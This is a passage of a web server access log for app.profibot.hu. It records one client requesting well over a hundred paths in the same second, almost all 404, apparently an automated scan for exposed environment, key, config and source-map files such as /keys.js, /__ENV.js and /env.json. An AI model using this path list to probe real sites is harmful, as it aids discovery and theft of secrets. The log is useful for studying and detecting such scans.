10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/vite.config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/astro.config.mjs" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/keys.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_astro/hoisted.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/__ENV.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/vendors.app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/runtime~main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/3.chunk.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/app.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_astro/page.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/.astro/types.d.ts" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/asset-manifest.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/__config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/constants.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/api/config.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/webpack.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/runtime.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/public/page-data/app-data.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/app/entry.client.tsx" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/settings.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/assets/index.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/@vite/env" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/vite.config.ts" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/assets/js/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/bundle.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/window.env.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/public/build/entry.client.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/public/build/manifest.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/app/root.tsx" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/webpack.runtime.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_astro/client.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/remix.config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/runtime-config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/js/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/qwik-loader.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/client.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/assets/vendor.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/bundle.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/js/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/src/env.d.ts" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/env.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/commons.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/webpack-runtime.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/src/constants.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/env.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/checkout.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/bundle.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/vendor.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/runtime.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/bundle.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/static/js/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/static/js/bundle.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/public/js/bundle.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/public/js/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/assets/js/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/app.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/js/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/index.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/js/config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/static/js/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/app.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/bundle.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.chunk.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/assets/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/assets/index.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/js/app.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/main.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/pages/_app.js.map" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/development/pages/_app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/pages/index.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/config/index.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/app.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/checkout" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/src/env.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/cart" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.chunk.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/runtime-main.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/src/config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/lib/config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/config/env.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/2.chunk.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/env-config.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/config.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/payment" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/api/settings" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/donate" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 216.81.248.16] [Length 2982] [Gzip 3.09] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/manifest.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/sw.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/serviceworker.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/api/v1/config" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/workbox.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/0.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/build/q-manifest.json" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/static/js/5.chunk.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/framework.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/chunks/index.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:19:44:12 +0000] - 404 404 - GET https app.profibot.hu "/dist/solid.js" [Client 216.81.248.16] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows 